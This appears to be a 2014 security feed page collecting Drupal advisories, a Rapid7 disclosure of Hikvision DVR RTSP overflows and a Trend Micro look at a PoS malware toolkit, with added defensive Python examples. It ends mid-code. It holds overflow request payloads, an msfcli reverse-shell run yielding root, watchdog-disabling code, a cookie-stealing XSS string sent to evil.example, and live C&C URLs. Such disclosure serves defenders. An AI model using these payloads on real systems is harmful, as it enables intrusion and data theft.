Feed aggregator

SA-CONTRIB-2014-115 - Form Builder - Cross-Site Scripting (XSS)

Drupal contributed modules - Wed, 11/19/2014 - 20:34
Description

The Form Builder module enables users to build entire Form API structures through a graphical, AJAX-like interface.

The module doesn't sufficiently sanitize form titles in some cases.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create forms in another module that depends on Form Builder, such as Survey Builder, Webform, or others.

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Form Builder 7.x-1.x versions prior to 7.x-1.6.
  • Form Builder 6.x-1.x versions prior to 6.x-1.6.

Drupal core is not affected. If you do not use the contributed Form Builder module,
there is nothing you need to do.

Solution

Install the latest version:

Also see the Form Builder project page.

Reported by
  • Matt Vance, provisional member of the Drupal Security Team
Fixed by
Coordinated by
  • Matt Vance, provisional member of the Drupal Security Team
Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Drupal version: Drupal 6.x, Drupal 7.x
Categories: security

R7-2014-18: Hikvision DVR Devices - Multiple Vulnerabilities

Meta-Sploit - Wed, 11/19/2014 - 20:17

Rapid7 Labs has found multiple vulnerabilities in Hikvision DVR (Digital Video Recorder) devices, such as the DS-7204 and other models in the same product series, that allow a remote attacker to gain full control of the device. More specifically, three typical buffer overflow vulnerabilities were discovered in Hikvision's RTSP request handling code: CVE-2014-4878, CVE-2014-4879 and CVE-2014-4880. This blog post serves as disclosure of the technical details of those vulnerabilities. In addition, a Metasploit exploit module that achieves remote code execution has been published.


Vulnerability Summary


After starting Project Sonar in 2013, Rapid7 Labs began investigating several protocols, services and devices that are popular on the internet, in order to find and raise awareness of widespread misconfigurations and vulnerabilities. One category of these devices is the so-called "Digital Video Recorder" (sometimes "Network Video Recorder"). Typically they record surveillance footage of office buildings and their surroundings, or even private properties.

Sifting through our Sonar datasets, several vendors and families of these devices turned up, but the Hikvision models in particular are very popular and widespread across the public IPv4 address space, with around 150,000 devices remotely accessible. Speculating about the reasons for this popularity, one could argue that the iPhone app which can view the surveillance streams remotely is very appealing to a lot of customers.

Apart from the fact that these devices ship with a default administrative account "admin" with password "12345", they also contain several quickly found vulnerabilities that ultimately lead to full remote compromise. During our initial analysis we found three different buffer overflow vulnerabilities in the RTSP request handler:


  • [CVE-2014-4878] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP request body handling
  • [CVE-2014-4879] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP request header handling
  • [CVE-2014-4880] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP basic authentication handling


CVE-2014-4878 - Buffer Overflow in the RTSP Request Body Handling


The RTSP request handler uses a fixed-size buffer of 2048 bytes to consume the (HTTP-style) request body, which leads to a buffer overflow when a larger body is sent. This can most likely be exploited for code execution; here we only present a denial-of-service proof:

    request  = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST   # HOST: address of the target device
    request += "CSeq: 7\r\n"
    request += "Authorization: Basic AAAAAAA\r\n"
    request += "Content-length: 3200\r\n\r\n"
    request += "A" * 3200

CVE-2014-4879 - Buffer Overflow in the RTSP Request Header Handling


The RTSP request handler uses fixed-size buffers when parsing the (HTTP-style) headers, which leads to a buffer overflow when a large header key is sent. This can most likely be exploited for code execution; here we only present a denial-of-service proof:

    request  = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST   # HOST: address of the target device
    request += "Authorization"
    request += "A" * 1024
    request += ": Basic AAAAAAA\r\n\r\n"

CVE-2014-4880 - Buffer Overflow in the RTSP Basic Authentication Handling


The Metasploit module written for this vulnerability sends a crafted RTSP request that triggers a buffer overflow when the "Basic Auth" header of an RTSP transaction is handled. Through this condition the request takes control of the remote instruction pointer and diverts execution to a series of ROP gadgets that pivot the stack to an area within the request packet itself, so that execution continues there. In the case below, the code placed in this area is a standard reverse shellcode generated by Metasploit.

    ./msfcli exploit/linux/misc/hikvision_rtsp_bof payload=linux/armle/shell_reverse_tcp RHOST=192.0.0.64 LHOST=192.0.0.2 SHELL=/bin/sh SHELLARG=sh E
    [*] Initializing modules...
    payload => linux/armle/shell_reverse_tcp
    RHOST => 192.0.0.64
    LHOST => 192.0.0.2
    SHELL => /bin/sh
    SHELLARG => sh
    [*] Started reverse handler on 192.0.0.2:4444
    [*] Command shell session 1 opened (192.0.0.2:4444 -> 192.0.0.64:52021) at 2014-09-15 18:09:03 +0200
    id
    uid=0(root) gid=0(root)

No authentication is required to exploit this vulnerability and the Metasploit module successfully demonstrates gaining full control of the remote device.
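As an added example, not part of the Rapid7 post or of any Hikvision firmware, the following Python sketches the bounds-checked handling that the three findings above call for. It rebuilds the two denial-of-service requests shown above as bytes, adds an oversized Basic token as a stand-in for the CVE-2014-4880 trigger (the post does not show that payload), and feeds them to a parser that refuses oversized header names, bodies longer than its buffer, and oversized credentials instead of copying them. The size limits, the HOST placeholder (the same address as the msfcli run above) and the function names are this example's own choices.

```python
import base64
import binascii

# Limits are this example's own choices. The post says the device used a
# 2048-byte body buffer and fixed-size header buffers; it does not say what
# sizes a fixed firmware would use.
MAX_HEADER_NAME = 64
MAX_HEADER_VALUE = 1024
MAX_BODY = 2048
MAX_AUTH_TOKEN = 256


class RtspRequestError(ValueError):
    """Raised for any request the bounded parser refuses to handle."""


def parse_rtsp_request(raw: bytes) -> dict:
    """Parse one RTSP request, rejecting anything that would overrun a fixed buffer."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise RtspRequestError("no end of headers")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        raise RtspRequestError("bad request line")
    method, url, _version = parts

    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            raise RtspRequestError("header without ':'")
        # CVE-2014-4879 shape: an oversized header name (or value) is refused before it is stored.
        if len(name) > MAX_HEADER_NAME or len(value) > MAX_HEADER_VALUE:
            raise RtspRequestError("header too long: %r" % name[:16])
        headers[name.strip().lower()] = value.strip()

    # CVE-2014-4878 shape: honour Content-length only up to the buffer size.
    try:
        length = int(headers.get(b"content-length", b"0"))
    except ValueError:
        raise RtspRequestError("bad Content-length")
    if length < 0 or length > MAX_BODY or len(body) > MAX_BODY:
        raise RtspRequestError("body exceeds %d bytes" % MAX_BODY)

    # CVE-2014-4880 shape: bound the Basic credentials before decoding them.
    creds = None
    auth = headers.get(b"authorization")
    if auth is not None:
        scheme, _, token = auth.partition(b" ")
        if scheme.lower() != b"basic" or len(token) > MAX_AUTH_TOKEN:
            raise RtspRequestError("unsupported or oversized Authorization")
        try:
            creds = base64.b64decode(token, validate=True)
        except binascii.Error:
            raise RtspRequestError("Authorization token is not valid base64")
        if b":" not in creds:
            raise RtspRequestError("Basic credentials lack 'user:pass'")

    return {"method": method.decode(), "url": url.decode(), "headers": headers,
            "body": body[:length], "creds": creds}


def classify(raw: bytes) -> str:
    """'ok' for an accepted request, otherwise the reason it was refused."""
    try:
        parse_rtsp_request(raw)
        return "ok"
    except RtspRequestError as e:
        return str(e)


HOST = "192.0.0.64"   # placeholder target address, as in the msfcli run above


def poc_body(host: str = HOST) -> bytes:
    """The CVE-2014-4878 DoS request from the post, as bytes."""
    req = "PLAY rtsp://%s/ RTSP/1.0\r\nCSeq: 7\r\nAuthorization: Basic AAAAAAA\r\n" % host
    req += "Content-length: 3200\r\n\r\n"
    return req.encode() + b"A" * 3200


def poc_header(host: str = HOST) -> bytes:
    """The CVE-2014-4879 DoS request from the post, as bytes."""
    return ("PLAY rtsp://%s/ RTSP/1.0\r\nAuthorization" % host).encode() + b"A" * 1024 + b": Basic AAAAAAA\r\n\r\n"


def poc_auth(host: str = HOST, n: int = 1000) -> bytes:
    """Stand-in for the CVE-2014-4880 trigger (assumed shape: an oversized Basic token)."""
    return ("PLAY rtsp://%s/ RTSP/1.0\r\nCSeq: 1\r\nAuthorization: Basic " % host).encode() + b"A" * n + b"\r\n\r\n"


def benign(host: str = HOST) -> bytes:
    """A well-formed request using the default admin/12345 credentials named in the post."""
    token = base64.b64encode(b"admin:12345").decode()
    return ("DESCRIBE rtsp://%s/ RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic %s\r\n\r\n" % (host, token)).encode()


if __name__ == "__main__":
    for name, req in [("body", poc_body()), ("header", poc_header()), ("auth", poc_auth()), ("benign", benign())]:
        print("%-7s %s" % (name, classify(req)))
```

The order of the checks matters: header sizes are enforced while each line is read, the body is bounded before any of it is consumed, and the credentials are bounded before the base64 decode allocates anything, so none of the three request shapes reaches a copy it could overrun.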

Hikvision Reboot Watchdog - Post Exploitation


The firmware implements watchdog functionality as a kernel module reachable through the /dev/watchdog device node. The main binary opens this node and writes one byte to it every two seconds; if those writes stop, the kernel module reboots the device. After getting into the system, the watchdog can be switched off with the following ioctl:

    #include <fcntl.h>
    #include <sys/ioctl.h>

    /* 0x80045704 is WDIOC_SETOPTIONS from <linux/watchdog.h>; option value 1 is WDIOS_DISABLECARD. */
    int one = 1;
    int fd  = open("/dev/watchdog", O_RDWR);   /* the original passes the raw flag value 2 (O_RDWR) */
    int ret = ioctl(fd, 0x80045704, &one);

After running this on the device, either as part of the shellcode or as a post-exploitation stage, the watchdog does not reboot the device anymore.

Vendor Analysis, Solutions and Workarounds


The device under test was a Hikvision-DS-7204-HVI-SV digital video recorder device with firmware V2.2.10 build 131009 (Oct 2013). Other devices in the same model range are affected too, however, we do not have an exhaustive list of firmware versions and models.

Prior to this research, CVE-2013-4977 was discovered by Anibal Sacco and Federico Muttis from Core Exploit Writers Team, affecting multiple Hikvision devices. We confirmed the device under test for this advisory is still vulnerable to their attack. Given the presence of this prior vulnerability in the analyzed DVR device, we believe that it is likely that all products offering identical features are affected by these issues.

Hikvision provided no response to these issues after several attempts to contact them. To mitigate these exposures until a patch is released, Hikvision DVR devices and similar products should not be exposed to the internet without the usual additional protective measures, such as an authenticated proxy or VPN-only access.


Sidenote on previous compromise of DVRs by Malware


Earlier this year, researchers from SANS found a botnet consisting mostly of DVR devices and routers whose main purposes include bitcoin mining. This botnet used default credentials to compromise the devices, and while we have no statistics on the number of infected devices, we assume that a relatively high percentage of devices still have the default password configured. More widespread exploitation possibilities, not only on DVRs but also on other embedded devices, could lead to a larger botnet that subsequently poses a larger threat to the rest of the internet.


Vulnerability Disclosure Timeline and Researcher Credit


CVE-2014-4878, CVE-2014-4879 and CVE-2014-4880 were discovered and researched by Mark Schloesser from Rapid7 Labs.


Disclosure Timeline:

Sep 15, 2014: Vendor contacted

Oct 06, 2014: Disclosure to CERT/CC

Oct 09, 2014: CVE identifiers assigned

Nov 19, 2014: Public disclosure

Nov 19, 2014: Metasploit module for CVE-2014-4880 published as PR 4235

Categories: security

SA-CONTRIB-2014-114 - Tournament - Cross Site Scripting

Drupal contributed modules - Wed, 11/19/2014 - 20:11
Description

This project allows you to create various types of tournaments (as nodes) and the associated teams and matches.

There are several cases in the project where an account username, node title, and team entity title are not correctly filtered before being displayed to a user.

Nodes or entities containing an XSS payload can be created directly, and usernames carrying a payload can be imported or created through an add-on module such as LDAP integration.

This vulnerability is mitigated by the fact that an attacker must have a role with the permissions "Create new teams" or "Tournament: Create new content" or "Match: Create new content" or the ability to create users with an XSS payload in the usernames (Drupal core's input validation prevents XSS payloads in usernames).
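The mitigation above rests on core's username validation, which an LDAP sync bypasses. The following added example (not the Tournament module's code, and not Drupal's; the username rule is a Python approximation of core's user_validate_name() character check, and the sample values are constructed) shows why the filtering belongs at output time regardless of where a value came from. The same point applies to the Form Builder and Node Field advisories on this page.

```python
import html
import re

# Approximation of Drupal 7 core's user_validate_name() rules: a username may
# contain only these characters, no leading/trailing/double spaces, max 60 chars.
_ILLEGAL_NAME_CHAR = re.compile(r"[^\x80-\xf7 a-z0-9@_.'-]", re.IGNORECASE)
USERNAME_MAX_LENGTH = 60


def username_passes_core_validation(name: str) -> bool:
    """True if Drupal core's registration form would accept this username."""
    if not name or len(name) > USERNAME_MAX_LENGTH:
        return False
    if name != name.strip() or "  " in name:
        return False
    return _ILLEGAL_NAME_CHAR.search(name) is None


def render_team_row_unsafe(team_title: str, captain: str) -> str:
    """The pattern the advisory describes: values dropped into markup unescaped."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (team_title, captain)


def render_team_row(team_title: str, captain: str) -> str:
    """Escape at output time (what check_plain() does in Drupal), whatever the value's origin."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(team_title, quote=True), html.escape(captain, quote=True))


def leaks_markup(rendered: str, template: str = "<tr><td>%s</td><td>%s</td></tr>") -> bool:
    """True if the rendered row contains any '<' beyond the ones the template itself supplies."""
    return rendered.count("<") > template.count("<")


# Constructed sample values: a team title typed into the form, and a username
# that core's form would refuse but an LDAP sync could write straight to the users table.
TEAM_TITLE = "Red Team <script>document.location='//evil.example/?'+document.cookie</script>"
LDAP_USERNAME = "svc_account\"><img src=x onerror=alert(1)>"

if __name__ == "__main__":
    print("core form accepts LDAP name:", username_passes_core_validation(LDAP_USERNAME))
    print("unsafe row leaks markup:   ", leaks_markup(render_team_row_unsafe(TEAM_TITLE, LDAP_USERNAME)))
    print("escaped row leaks markup:  ", leaks_markup(render_team_row(TEAM_TITLE, LDAP_USERNAME)))
```

The check in leaks_markup is a cheap test to run over a module's rendered output in a test suite: any `<` that the template did not put there came from a value that reached the page unescaped.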

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Tournament 7.x-1.x any version

Drupal core is not affected. If you do not use the contributed Tournament module,
there is nothing you need to do.

Solution

Install the latest version:

Also see the Tournament project page.

Reported by
Fixed by
Coordinated by
Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Drupal version: Drupal 7.x
Categories: security

SA-CONTRIB-2014-113 - Secure Password Hashes - Denial of Service

Drupal contributed modules - Wed, 11/19/2014 - 19:54
Description

This module enables more secure password storage for Drupal 6 by back-porting the password hashing code used in Drupal 7 core.

A vulnerability in this API allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).

This vulnerability can be exploited by anonymous users.

See also: https://www.drupal.org/SA-CORE-2014-006

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Secure Password Hashes 6.x-2.x versions prior to 6.x-2.1.

Drupal core is not affected. If you do not use the contributed Secure Password Hashes module,
there is nothing you need to do.

Solution

Install the latest version:

Also see the Secure Password Hashes project page.

Reported by
Fixed by
  • Peter Wolanin the module maintainer and Drupal Security Team member
Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Drupal version: Drupal 6.x
Categories: security

Drupal Core - Moderately Critical - Multiple Vulnerabilities - SA-CORE-2014-006

Drupal core - Wed, 11/19/2014 - 18:21
Description

Session hijacking (Drupal 6 and 7)

A specially crafted request can give a user access to another user's session, allowing an attacker to hijack a random session.

This attack is known to be possible on certain Drupal 7 sites which serve both HTTP and HTTPS content ("mixed-mode"), but it is possible there are other attack vectors for both Drupal 6 and Drupal 7.

Denial of service (Drupal 7 only)

Drupal 7 includes a password hashing API to ensure that user supplied passwords are not stored in plain text.

A vulnerability in this API allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).

This vulnerability can be exploited by anonymous users.
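Added example, not Drupal's own code, illustrating the cost model behind this kind of hashing denial of service (it applies equally to the Secure Password Hashes backport in SA-CONTRIB-2014-113 above). It assumes, as this example's own reading and not as something the advisory states, that the problem is PHPass-style stretching in which every one of the 2^15 rounds re-feeds the whole submitted password to SHA-512, so that verifying one anonymous login attempt costs time linear in the password length, and that the remedy is to refuse over-long passwords before hashing. The salt, the round counts used in the demo and the 512-byte cap are illustrative constants.

```python
import hashlib
import time

DRUPAL_HASH_COUNT = 15      # Drupal 7 default: 2**15 rounds
MAX_PASSWORD_BYTES = 512    # assumption for this example: cap applied before any hashing


def stretch(password: bytes, salt: bytes, count_log2: int = DRUPAL_HASH_COUNT, max_len=MAX_PASSWORD_BYTES):
    """Simplified PHPass-style stretching: each round hashes (previous digest || whole password).
    Returns None when the password is refused by the cap, otherwise the hex digest."""
    if max_len is not None and len(password) > max_len:
        return None
    digest = hashlib.sha512(salt + password).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + password).digest()
    return digest.hex()


def bytes_hashed(password_len: int, count_log2: int = DRUPAL_HASH_COUNT) -> int:
    """Bytes SHA-512 must absorb to verify one password: linear in its length."""
    return (1 << count_log2) * (64 + password_len)


def timed(password: bytes, count_log2: int, max_len):
    """Wall-clock cost of one verification with the given cap (None = no cap)."""
    start = time.perf_counter()
    result = stretch(password, b"12345678", count_log2, max_len)
    return time.perf_counter() - start, result


if __name__ == "__main__":
    # 2**8 rounds keeps the demo quick; the ratio between the two runs is the point.
    normal_t, _ = timed(b"correct horse", 8, None)
    huge_t, _ = timed(b"A" * (1 << 20), 8, None)      # a 1 MiB "password" from an anonymous login POST
    print("13-byte password: %.4fs   1 MiB password: %.3fs   ratio %.0fx"
          % (normal_t, huge_t, huge_t / max(normal_t, 1e-9)))
    print("1 MiB password with the cap:", timed(b"A" * (1 << 20), 8, MAX_PASSWORD_BYTES))
    print("bytes hashed at 2**15 rounds, 1 MiB vs 13 bytes: %dx"
          % (bytes_hashed(1 << 20) // bytes_hashed(13)))
```

At the production round count the 1 MiB case means tens of gigabytes through SHA-512 per request, which is why the limit has to sit in front of the loop rather than on the form: the login and password-reset paths reach the hashing API with whatever the client posted.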

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Drupal core 6.x versions prior to 6.34.
  • Drupal core 7.x versions prior to 7.34.
Solution

Install the latest version:

If you have configured a custom session.inc file for your Drupal 6 or Drupal 7 site you also need to make sure that it is not prone to the same session hijacking vulnerability disclosed in this security advisory.

If you have configured a custom password.inc file for your Drupal 7 site you also need to make sure that it is not prone to the same denial of service vulnerability disclosed in this security advisory. See also the similar security advisory for the Drupal 6 contributed Secure Password Hashes module: SA-CONTRIB-2014-113

Also see the Drupal core project page.

Reported by

Session hijacking:

Denial of service:

Fixed by

Session hijacking:

Denial of service:

Coordinated by
  • The Drupal Security Team
Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Edits to this advisory since publishing
  • Edited to mention the effect on sites that have configured a custom session.inc file.
Drupal version: Drupal 6.x, Drupal 7.x
Categories: security

SA-CONTRIB-2014-112 - Node Field - Cross Site Scripting (XSS)

Drupal contributed modules - Wed, 11/19/2014 - 18:06
Description

Node Field module allows you to add custom extra fields to single Drupal nodes.

The module doesn't sufficiently sanitize user input for some of the module's internal fields. This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create nodes.

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Node Field 7.x-2.x versions prior to 7.x-2.45.

Drupal core is not affected. If you do not use the contributed Node Field module,
there is nothing you need to do.

Solution

Install the latest version:

Also see the Node Field project page.

Reported by
Fixed by
Coordinated by
Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Drupal version: Drupal 7.x
Categories: security

SA-CONTRIB-2014-111 - Protected Pages - Password Protection Bypass

Drupal contributed modules - Wed, 11/19/2014 - 17:56
Description

The Protected Pages module allows an administrator to password-protect any page on the site by configuring a path and the password associated with it.

The module did not sufficiently protect variations on the protected path, so a request for a differently written form of the same path could bypass the password check.
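Added example, not the Protected Pages module's code: the general shape of the bug class, an exact string compare against the configured path, beside a check that canonicalises the request first. The variations it handles (the ?q= form, percent-encoding, duplicate and trailing slashes, letter case) are the ones a practitioner would test, assumed here rather than taken from the advisory, which does not say which variation was fixed; resolving path aliases would additionally need the alias table.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed configuration: the paths an administrator protected.
PROTECTED = ["node/12", "internal/pricing"]


def normalize_path(request_uri: str) -> str:
    """Reduce a request URI to the Drupal system path it would route to.
    Case folding is an assumption: Drupal 7's router lookup is a DB query whose
    collation is usually case-insensitive, so 'Node/12' typically serves node/12."""
    parts = urlsplit(request_uri)
    path = parts.path
    q = parse_qs(parts.query).get("q")
    if q:                      # index.php?q=node/12 routes the same as /node/12
        path = q[0]
    path = unquote(path)       # node%2F12 -> node/12
    while "//" in path:
        path = path.replace("//", "/")
    return path.strip("/").lower()


def naive_is_protected(request_uri: str, protected=PROTECTED) -> bool:
    """Exact string compare against the configured path: the bug class in the advisory."""
    return request_uri in protected


def is_protected(request_uri: str, protected=PROTECTED) -> bool:
    """Compare canonical forms on both sides, so the configured path is normalised too."""
    canonical = {normalize_path(p) for p in protected}
    return normalize_path(request_uri) in canonical


# Constructed request variants that all reach node/12.
VARIANTS = ["node/12", "/node/12/", "/Node/12", "/node//12", "/node%2F12",
            "/index.php?q=node/12", "/?q=node%2F12"]

if __name__ == "__main__":
    for v in VARIANTS:
        print("%-24s naive=%-5s normalized=%s" % (v, naive_is_protected(v), is_protected(v)))
```

The safer design, which the normalising check only approximates, is to hook the check on the resolved system path after routing (in Drupal 7, the router item / hook_init stage) rather than on the raw request, so every alias and encoding has already been collapsed by core before the comparison.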

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Protected Pages 7.x-2.x versions prior to 7.x-2.2.

Drupal core is not affected. If you do not use the contributed Protected Pages module,
there is nothing you need to do.

Solution

Install the latest version:

Also see the Protected Pages project page.

Reported by
Fixed by
Coordinated by
Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Drupal version: Drupal 7.x
Categories: security

A New Free CA (Schneier blog)

SANS diary - Wed, 11/19/2014 - 14:00
Categories: security

A Peek Inside a PoS Scammer’s Toolbox

Trend-Micro - Wed, 11/19/2014 - 13:00

PoS malware has received a tremendous amount of attention in the past two years, with high-profile incidents at Target, Home Depot, and Kmart. With the massive "Black Friday" shopping season coming up, PoS malware will surely get additional publicity. Because of this, we constantly look for evolving PoS malware and study its behavior patterns to better protect our customers and users.

To be successful, PoS scammers don't rely only on their malware to attack and exfiltrate victim data. They also use a wide variety of tools to support their endeavors. Some of these are tools that system administrators also use, such as PuTTY and the utilities Microsoft provides in the Sysinternals suite.

Looking at the additional tools PoS threat actors use is interesting because it gives a preview of their daily activities and lets us profile them.

PoS Terminal Insecurities

Unfortunately, PoS terminals and environments are very often left insecure. This makes them an excellent target of opportunity for attackers. There are a variety of methods used when attackers go after PoS terminals. One way attackers gain access to PoS devices is via VNC (Virtual Network Computing). Typically, credentials are either non-existent or very weak. This gives attackers many opportunities to use tools that attack VNC credentials.

Microsoft's Remote Desktop Protocol presents an additional weak point in PoS environments. Unfortunately, the same weaknesses often found in VNC sessions are also found in RDP configurations. Weak or nonexistent credentials are common on PoS terminals using RDP. This likewise gives attackers many opportunities to use tools that attack RDP sessions.

BackOff Actor Toolkits

Earlier this year, Trend Micro published a paper detailing many different PoS RAM scrapers, including BackOff. BackOff became popular and widely used starting in July 2014 because it is custom-packed to obfuscate its code, which makes it difficult for security researchers to reverse-engineer its binaries.

BackOff will almost always, in some way, communicate with a command-and-control (C&C) server to exfiltrate data or receive configuration updates. In addition to receiving commands and exfiltrating data, these same servers are often used to transfer tools to and from victim machines. This helps the attacker get tasks done easily and quickly while drawing the least attention, by reducing the work needed to transfer these tools to multiple victims.

When looking at BackOff variants, one particular sample drew our attention: r0.exe. Upon examination, we found that this sample connects to http://143biz.cc.md-14.webhostbox.net. The infection vector is not known.

This particular C&C server contained a wealth of information about what tools the attackers are using, as well as how they stored their data. We noticed a litany of other tools that the attackers were using. Typically, these tools are used in conjunction with the malware, or after a machine has been compromised.

The server hosted multiple files, including ZIP files, which are broken down further below. This is not an all-inclusive list of the files on the server, but is meant to showcase the tools and capabilities of these actors.

r0.exe (MD5 hash: 7a5580ddf2eb2fc4f4a0ea28c40f0da9) – This file is a BackOff sample that was compiled on October 22, 2014. The file communicates to the following URLs for its C&C functions:

  • https://cyberwise.biz/register/register.php
  • https://verified-deal.com/register/register.php

r0.exe also creates a known BackOff mutex, aMD6qt7lWb1N3TNBSe4N.

3-2.exe (MD5 hash: 0fb00a8ad217abe9d92a1faa397842dc) – This file is also a BackOff sample which was compiled approximately a month earlier than r0.exe (it was compiled on September 16, 2014). This file communicates to:

  • https://kitchentools.ru/phpbb/showtopic.php
  • https://cyclingtools.ru/phpbb/showtopic.php
  • https://biketools.ru/phpbb/showtopic.php

DK Brute priv8.rar (MD5 hash: 028c9a1619f96dbfd29ca64199f4acde) – This RAR file contains multiple tools and files. One of these files is putty.exe, an SSH/telnet client. Also included were UltraVNCViewerPortable.exe and WinSCP. Both of these tools make sense in a scammer's toolkit, as they can be used to connect to remote systems and transfer files.

DK Brute.exe is also included; this is a tool used to brute force Windows RDP and other remote connection protocols, using a password list.

IPCity.rar (MD5 hash: 9223e3472e8ff9ddfa0d0dbad573d530) – This RAR file contains three files. One is a .CSV file (GeoLiteCity.csv) which maps countries to latitude/longitude coordinates. This file appears to be an older free download from Maxmind, which provides databases that map physical locations to IP blocks.

A tool called ip_city.exe was in the RAR file as well. This tool is used to convert city and country locations to IP blocks. Taken collectively, these tools can be used by an attacker to better scan and target particular countries and IP blocks.

Figure 1. Screenshot of ip_city.exe

VUBrute 1.0.zip (MD5 hash: 01d12f4f2f0d3019756d83e94e3b564b) – This password-protected ZIP file contains a VNC brute forcer, VUBrute. This tool is popular in Russian underground forums and is used to compromise VNC credentials.

Figure 2. Screenshot of VUBrute

logmein_checker.rar (MD5 hash: 5843ae35bdeb4ca577054936c5c3944e) – This RAR file contains an application called Logmein Checker. LogMeIn is a popular commercial remote access tool. This application takes an account list (a list of username/password combinations) and runs it through a list of IP addresses/ports. This is used to find valid LogMeIn sessions using weak credentials.

Figure 3. Logmein Checker UI

The attackers are likely using this to attack either PoS machines with weak LogMeIn credentials, or other machines on networks that also contain PoS devices.

portscan.rar (MD5 hash: 8b5436ca6e520d6942087bb38e97da65) – This file contains a file named KPortScan3.exe, which is a basic port scanner. It allows IP ranges and port numbers to be entered. Based on data obtained from the C&C server, we believe this tool was used to scan ports 445, 3389 and 5900 (SMB, RDP and VNC respectively), as well as other ports. It's likely this tool was chosen because of its ease of use and the likelihood that a port scanner would be run on Windows.

Figure 4. Port scanner UI

C&C Infrastructure Analysis and Relationship Building

After looking closer at the C&C server, we pivoted and found additional files that are or have been hosted on it. In total, there have been over 9 unique malware samples hosted on http://143biz.cc.md-14.webhostbox.net, dating back to February 2014. This includes other PoS malware, such as Alina, a popular PoS RAM scraper.

We also found an additional directory on this server: http://143biz.cc.md-14.webhostbox.net/something/login.php?p=Rome0. The name Rome0 may look familiar to those of you who follow Xyiltol and the Trackingcybercrime blog.

While accessing this directory doesn't generate a response, we continued to check for sites that had /something/login.php?p=Rome0 as part of the URL. When doing this, we found another site: https://blog.wordpress-catalog.com/something/login.php?p=Rome0. Looking closer at the relationship between 143biz.cc.md-14.webhostbox.net and wordpress-catalog.com, we saw that there was an open directory on the C&C server: http://143biz.cc.md-14.webhostbox.net/accounts.wordpress-catalog.com. These URLs don't return any results either.

When we looked at the root directory, however, we found a ZIP file named something.zip (MD5 hash: f9cbd1c3c48c873f3bff8c957ae280c7). This file contained what appeared to be the code for the C&C server, as well as several text documents containing names and credit card track data.

Figure 5. Server root directory contents

While we don't know if the same French criminal Rome0 owns or operates these two servers for PoS operations, we do know that both servers have used Rome0 in their URLs. We also noticed in one of the text files a path, /home/rome0/public_html/something/bot.php, presumably showing the user's internal directory for hosting files. In addition, we know that Rome0 is heavily involved in PoS malware and carding, based on Xyiltol's excellent investigative work.

Conclusion

While we didn't showcase many new tools in this post, it is an interesting case study of some of the tools that PoS scammers use. This list isn't exhaustive, but it shows that the attackers using these tools are not particularly advanced. They use what works, without reinventing the wheel and developing new programs.

Information about these tools helps administrators protect PoS systems on an ongoing basis.

In addition to the malicious files listed above, here is a list of all the URLs we looked into for this post:

  • http://143biz.cc.md-14.webhostbox.net
  • https://biketools.ru/phpbb/showtopic.php
  • https://blog.wordpress-catalog.com/
  • https://cyberwise.biz/register/register.php
  • https://cyclingtools.ru/phpbb/showtopic.php
  • https://kitchentools.ru/phpbb/showtopic.php
  • https://verified-deal.com/register/register.php
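Added example, not Trend Micro's code: the indicators listed in this post (file hashes, C&C hosts, the BackOff mutex name and the SMB/RDP/VNC ports the scanner was used against) turned into three checks a PoS administrator could run over their own data. The file inventory, proxy log lines and flow records below are constructed for the example; the hash check is only as good as the hashes, since a repacked BackOff build will not match, so the C&C-host and port-sweep checks are the ones worth keeping.

```python
import re
from collections import defaultdict

# Indicators transcribed from the post above.
KNOWN_MD5 = {
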